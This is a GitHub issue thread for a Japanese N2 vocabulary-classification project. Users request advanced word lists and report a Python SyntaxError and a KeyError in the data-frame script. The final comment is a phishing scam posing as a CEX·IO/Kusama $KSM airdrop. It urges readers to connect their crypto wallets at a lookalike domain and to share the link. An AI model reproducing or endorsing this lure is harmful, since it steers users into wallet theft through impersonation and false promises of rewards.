### ISSUE TITLE
如果有高级的词汇就完美了

### ISSUE THREAD

**Issue by mkoplqq2006** [LzyRapx/N2-Janpanese-Classify#1]
如题，如果有高级的词汇就完美了

**Comment by lzyrapx** [comment]
欢迎提个有高级词汇的版本～

**Comment by mkoplqq2006** [comment]
嗯，有时间可以弄一下

新版标准日本语高级上册单词
https://wenku.baidu.com/view/7a48f1be9b6648d7c0c74676.html
新版标准日本语高级下册单词
https://wenku.baidu.com/view/5e9c8c8c58fafab068dc0261.html

**Comment by lzyrapx** [comment]
好呀～

**Comment by mkoplqq2006** [comment]
发现一个小问题

Traceback (most recent call last):
  File "C:\N2-Japanese\main.py", line 5, in <module>
    from src.get_data_frame import get_frame
  File "C:\N2-Japanese\src\get_data_frame.py", line 8
    print("---Start generating dataframe---')
                                            ^
SyntaxError: EOL while scanning string literal

**Comment by mkoplqq2006** [comment]
这里应该是 '中文' 吧

---Start generating dataframe---
  0%|          | 0/138 [00:00<?, ?it/s]{'日文': '高層', '假名': 'こうそう', '发音': '0', '中文': '高层', '类型': '名词'}

  0%|          | 0/138 [00:00<?, ?it/s]
Traceback (most recent call last):
  File "C:\N2-Japanese\main.py", line 17, in <module>
    df = get_frame(alpha)
  File "C:\N2-Japanese\src\get_data_frame.py", line 18, in get_frame
    chinese = entry['意思']
KeyError: '意思'

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
